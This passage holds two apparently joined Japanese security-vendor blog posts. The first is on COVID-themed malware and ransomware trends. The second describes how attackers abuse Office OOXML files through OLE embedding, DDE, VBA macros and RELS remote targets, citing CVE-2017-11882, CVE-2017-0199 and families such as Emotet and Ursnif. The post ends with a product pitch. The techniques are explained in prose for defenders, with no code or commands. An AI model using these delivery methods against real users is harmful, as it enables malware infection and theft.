この悪意のあるソフトウェアがダウンロードされると、感染したデバイス上のファイルにアクセスする許可を求め、許可が得られると、その許可を利用して写真やビデオなどの標的となるファイルを暗号化し、感染した各フォルダに身代金のメモを残しました。<h3>今後起こりうること</h3>
サイバー犯罪者たちは、自分たちの目的を達成するために何が効果的かを考えます。そこで、新型コロナウィルスの動向に合わせて、新たなマルウェアキャンペーンが展開されることが予想されます。新型コロナウィルス関連の規制は、感染拡大の状況に合わせて随時各国政府が調整をしているため、人々は最新の情報を得るのに苦労しています。攻撃者はこの機会を捉えて、新型コロナウィルスの規制に関連した不正なスパムキャンペーンを行い、「最新の情報」を掲載した悪質な Web サイトや、おそらく「最新の規制」に関する偽アプリを投入するかもしれません。また、ワクチンについての関心が集まっていることを利用して、ワクチンに関する新しい情報があるように装い、悪意のある添付ファイルを付けたフィッシングメッセージを送信するという方法も考えられます。
また、新学期を迎えることで、マルウェア作者、特に最終的なペイロードとしてランサムウェアを好むマルウェア作者の注目を集める可能性もあります。多くの組織がそうであるように、学校や学術機関も状況に合わせて運営方法を変更しなければならず、多くがオンライン授業に切り替えています。つまり、ランサムウェアが生徒の自宅の PC から学校のネットワークに侵入したり、より標的を絞った攻撃を受けたりすると、学校が麻痺してしまうのです。昔ながらの紙とペンに頼ることができなければ、感染した学区や大学は簡単に屈服し、身代金の支払いを余儀なくされるかもしれません。
新型コロナウィルスによる今後大きな変化としては、多くの企業でリモートワークへの移行が考えられます。コロナ禍で、企業はリモートワークに利点があることに気づきました。多くの従業員が、自宅では集中力が高まると報告し、中には労働時間が増える人もいましたし、企業は設備にかかる費用を大幅に節約できることがわかりました。多くの企業が半永久的にリモートワークを導入した場合、ハッカーはこの状況を利用して、遠隔勤務の攻撃対象範囲の拡大を利用した攻撃を仕掛けたり、遠隔勤務を可能にするソフトウェアにさらなる脆弱性を発見したりする可能性があります。
当然のことながら、リモートワーク環境を選択した企業は、直面する他のリスクに加えて、セキュリティに関するリスクの増加を考慮する必要があります。さらに、企業は、エンドポイント セキュリティ ソリューションや適切なセキュリティ トレーニングなどの適切なツールを従業員に提供する必要があります。
新型コロナウィルスや選挙など、大きなイベントや状況の変化は攻撃者に多くのチャンスを与えます。我々は次のマルウェア感染がワンクリックで発生する可能性があることを常に念頭に置き、攻撃者がどのように行動するかに関わらず、これまで以上に警戒する必要があります。

新型コロナウィルスをテーマにしたマルウェア対策に乗り遅れないために

Microsoft Office is one of the most common attack vectors used by malicious actors to spread their malware. Considering that most computers have Micro

ooxml.jpg

Microsoft Office は、悪意のあるアクターがマルウェアを拡散するために使用する最も一般的な攻撃手段の 1 つです。ほとんどのコンピュータには Microsoft Office がインストールされており、Office ファイルは組織や個人の間で一般的に共有されていることを考えると、この種のマルウェアに遭遇する可能性は非常に高いと言えます。このブログでは、Microsoft Office 文書（OOXML）に埋め込まれたマルウェアの普及状況、使用される一般的な攻撃ベクトル、そしてこのような攻撃から組織を守るための事前対策についてご紹介します。<h3>OOXML の不正操作に対する脆弱性</h3>
Office Open XML（OOXML）とは、Microsoft 社が xlsx、docx、pptx などの Microsoft Office ファイルを格納するために使用している ZIP ベースのファイル形式である。OLE ファイル形式の後継で、コンテンツの保持に XML ファイルではなく複合ファイルを使用しており、拡張子は「.doc」、「.ppt」、「.xls」で表され、OOXML ファイルの拡張子 docx、xlsx、pptx が一般的に使用されています。OLE ファイルと OOXML ファイルは互換性があり、一方の形式のファイルを他方の形式として保存しても、その機能はすべて維持されます。
以下は、OOXML ファイルと OLE ファイルの内部構造の例です。左の図は、OOXMLフ ァイルの構造を示しています。下の画像を見ると、ファイルはいくつかのディレクトリで構成される階層構造になっており、それぞれに XML ファイルが格納されていることがわかります。これらのディレクトリには、XML ファイルの他に、OLEオ ブジェクトや、PE ファイル、画像などの他のファイルタイプも含まれています。
右の図は OLE ファイルの構造を示しています。OLE ファイルには複合オブジェクトが含まれており、それぞれが Office ドキュメントの作成において特定の役割を担っています。&nbsp; 例えば、Microsoft Word ファイルの主な複合オブジェクトである「WordDocument」は、テキストの保存を担当している。<img src="https://deepinsarchive.wpengine.com/wp-content/uploads/2020/07/ooxml-structure.jpg" width="708" height="378" data-image="m5sjm6t51r4c">
OXMLファイルの構造（左）とOLEファイルの構造（右）<h3>サイバー脅威のトレンド</h3>
ご存知のように、Microsoft Office のファイルは非常に一般的で、日常的に個人や組織の間で共有されています。このため、多くのマルウェア作者は、OOXML および OLEフ ァイル形式が盛んに使用されていることを利用して、悪意のある活動を広めています。下のグラフは、2015 年 1 月以降の各年の四半期における OLE および OOXML ベースのマルウェアの相対的な量を示しています。Deep Instinct 社の D-Cloud から収集したこのデータは、任意の単位で表示されており、第 1 四半期における悪意のある OOXML ファイルの数を表す数字は1となっています。ご覧のように、OOXML と OLE の両方のマルウェアが、継続的に、しかしゆっくりと増加しています。OLE マルウェアの方が明らかに脅威となっていますが、OLE ベースのマルウェアと OOXML ベースのマルウェアの差は徐々に縮まっています。さらに、新型コロナウィルスのような世界的なパンデミックに関連したフィッシングキャンペーンや、米国の確定申告シーズンのような特定の国に関連した時期、あるいは新しいマルウェアの登場などにより、突発的なスパイクが発生することがあります。例えば、2016 年の第 3 四半期には、<a rel="noopener noreferrer" href="https://www.zdnet.com/article/ransomware-as-a-service-for-allows-wannabe-hackers-to-cash-in-on-cyber-extortion/" onclick="javascript:window.open('https://www.zdnet.com/article/ransomware-as-a-service-for-allows-wannabe-hackers-to-cash-in-on-cyber-extortion/'); return false;">ランサムウェア「cyber」</a>が、支払った身代金の40％ と引き換えにサービスを提供することを開始し、その結果、7 月だけで 15 万人以上のユーザーが被害に遭いました。&nbsp;<img src="https://deepinsarchive.wpengine.com/wp-content/uploads/2020/07/New_Microsoft_Office_Malware_Files_Per_Quarter_2-002.jpg" alt="New Microsoft Malware files per quarter" width="800" height="480" data-image="aam7on71rfu5">
四半期ごとに新たに発見された悪質な OOXML および OLE ファイルを任意の単位で表したものです。<h3>一般的な攻撃ベクター</h3>
OOXML ファイルフォーマットを使用する被害者を攻撃するために、悪意のあるアクターが使用する一般的な手法がいくつかあります。RELS などのいくつかの手法は、OOXML ファイルに特有のものですが、VBA マクロの使用などの他の手法は、OLE ファイルでもごく一般的なものです。<ol><li>OLE オブジェクト エンベッディングの活用</li></ol>
OOXML&nbsp; ファイルフォーマットでは、OOXML&nbsp; ファイル内に OLE オブジェクトを埋め込むことができます。OLE オブジェクトは、Microsoft Word など、Microsoft の Object Linking and Embedding（OLE）技術をサポートするプログラムで作成されます。他のファイルと同様、OLE オブジェクトにもハッカーが利用できる脆弱性があります。例えば、「CVE-2017-11882」を利用すれば、悪者は、 OOXML ファイルに埋め込まれた OLE オブジェクトを利用して、Office ファイルを開く以外にユーザーが操作することなく、被害者のコンピュータ上でリモートコードを実行することができます。悪名高い Loki マルウェアファミリーは、この方法を使って、ウェブブラウザからユーザー認証情報を採取したり、暗号ウォレットを盗んだり、付箋紙に保存されたデータを収集したりしていました。<ol><li>DDE 攻撃</li></ol>
DDE（Dynamic Data Exchange）とは、Microsoft Office アプリケーション間でデータを転送するためのプロトコルです。例えば、Microsoft Word の文書に表を挿入し、Excel のグラフからデータを取得し、Excel のグラフが変更されたときに更新することができます。このプロトコルは善意で作られたものであるが、その機能は善意ではない目的に使われることもある。基本的に DDE は、たった 1 つのカスタムフィールドで埋め込みコードの実行を可能にするため、攻撃者はこれを利用して様々なコマンドを簡単に実行することができます。通常、攻撃者はこの機能を利用して、追加のマルウェアをダウンロードして実行しますが、機密情報の共有や、脅威主体がコマンドを送信するためのリモートシェルの開設などにも利用できます。DDE は、何年も前に OLE ツールキットによって抑制された古いプロトコル（ 1987 年に最初に導入された）ですが、マイクロソフト社ではまだサポートされているため、セキュリティ上の脅威となっています。この問題を軽減するために、更新された Microsoft Office アプリケーションでは、DDE を含むドキュメントを開くと、通常2つのセキュリティ警告が表示されます。しかし、このようなファイルを潜在的な被害者に送りつける攻撃者は、被害者を騙して警告を無視させ、DDE コンテンツの実行を許可させることができます。例えば、Necurs. ボットネットは、被害者が要求した文書が添付されていると伝えるスピアフィッシングメールを使用し、実際には悪名高いランサムウェア「 Locky 」の配信に使用されたこれらの文書が信頼できるものであると被害者に思わせていました。<ol><li>VBA のマクロ</li></ol>
マクロとは、Microsoft Excel や Word の処理を自動化するためのコマンド群のことです。現代のマクロは、DDE と同様、OOXML に限ったことではありませんが、Visual Basic で書かれており、多くのアクションを実行できる完全な機能を持つスクリプト言語です。残念ながら、多くの攻撃者は、このレモンを使って、非常に苦いレモネードを作ります。 &nbsp;VBA を使えば、実行ファイルをダウンロードして実行したり、リバースシェルを開いたりすることができます。幸いなことに、マイクロソフトはそのことを認識しており、新しいバージョンの Microsoft Office アプリケーションがそのような VBA マクロを自動的に実行しないようにしています。&nbsp; しかし、上述したように、攻撃者は、被害者がマイクロソフトの提示する警告を無視してマクロの実行を許可するように操作する方法を見つけます。Emotet は、VBA スクリプトを難読化し、ベース 64 エンコーディングを使用することで、セキュリティベンダーに検知されにくい動作を実現しています。他の多くのマルウェアファミリーと同様に、このバンキングトロイの木馬は、VBA を使用して PowerShell コードを実行し、リモートアドレスからペイロードをダウンロードしてディスクに保存し、実行します。2019 年 8 月、Deep Instinct 社は、本番環境で興味深い&nbsp;<a href="https://www.deepinstinct.com/ja/blog/ursnif-ups-its-game-with-sophisticated-vba-and-powershell-combination-dropper" target="_blank" rel="noopener noreferrer">VBA マルウェアを発見</a>&nbsp;しました。このマルウェアUrsnif ドロッパーは、企業大手の DHL の請求書を装い、Excel ファイルとして配信されました。マルウェアの配信には、エンコードし難読化された PowerShell コードが使用されていました。<ol><li>RELS の悪用</li></ol>
OOXMLのRELS（Relationship File）は、OOXML ファイルの各部分がどのように接続されて文書を形成するかを記述したものです。RELS ファイルの中には「ターゲット」があり、これは通常、説明文が添付された文書の各部分への道筋を示します。しかし、これらのターゲットは、遠隔地に保存されているファイルを指定することができ、そのファイルは文書を開いたときに呼び出されます。当然ながら、この機能は攻撃者に利用され、ウェブベースのターゲットを指して悪意のあるペイロードをダウンロードすることで被害を与えます。例えば、リモートの HTML 実行ファイル「ターゲット」を追加し、脆弱性 CVE-2017-0199 を利用して、OOXML 文書が開かれたときに実行させることで、悪意のある目的を果たすことができるのです。&nbsp; この方法は、長年にわたり多くの脅威アクターによって実施されており、例えば、スパイウェア「PonyStealer」や「FormBook」のペイロードがこの方法で配信されていました。しかし、DDE や VBA マクロと同様に、RELS ファイルが外部コンテンツを読み込もうとすると、警告が表示されます。<ol><li>追加ファイルタイプの使用</li></ol>
OOXML は ZIP 形式であるため、攻撃者は RELS や [Content_Types].xml を修正することで、OOXML 内から任意のファイルを挿入・実行することができます。そのため、攻撃者はこの抜け道を利用してマルウェアを配信・実行します。例えば、PE ファイルを OOXML に挿入し、OOXML に含まれる VBA マクロで実行することができます。<h3>OOXML マルウェアからの防御方法</h3>
OOXML ファイルを警戒するだけでなく、企業はこの種の脅威を自律的に識別できる高度な脅威防止ソリューションを必要としています。選択されたソリューションは、これらのファイルを静的にも動的にも処理でき、この脅威が実行される前に防ぐことができなければなりません。また、万が一マルウェアがすり抜けてしまった場合でも、被害が出る前に悪意のある活動を阻止することができるソリューションでなければなりません。さらに、選択された製品は、悪意のある VBAマ クロの実行を防止する機能を備えている必要があります。
<a href="https://www.deepinstinct.com/ja" target="_blank" rel="noopener noreferrer">Deep Instinct&nbsp;</a>社の製品は、悪意のあるVBAマクロの実行を防止し、この種の脅威を排除するために特別に設計された&nbsp;&nbsp;<a href="https://www.deepinstinct.com/ja/why-deep-instinct" target="_blank" rel="noopener noreferrer">Deep Learning モデル</a>&nbsp;を使用して、顧客が侵害されたことに気づく前に、悪意のある活動をリアルタイムで探す動的なメカニズムを採用しており、すべての条件を満たしています。
OOXML ファイルは、一見すると何の問題もないように見えますが、非常に大きな問題を引き起こす可能性があります。過去にもマルウェア作者は OOXML ファイルを悪用する方法を見つけており、今後もその方法を見つける可能性が高いです。つまり、ユーザーはMicrosoft Officeファイルを開く際には慎重になるべきであり、組織は従業員が思うように警戒できない場合を考慮して、可能な限りのセキュリティ技術を導入する必要があります。

Microsoft Office ファイルがどのように操作されているか

Bar Block

From Bar Block.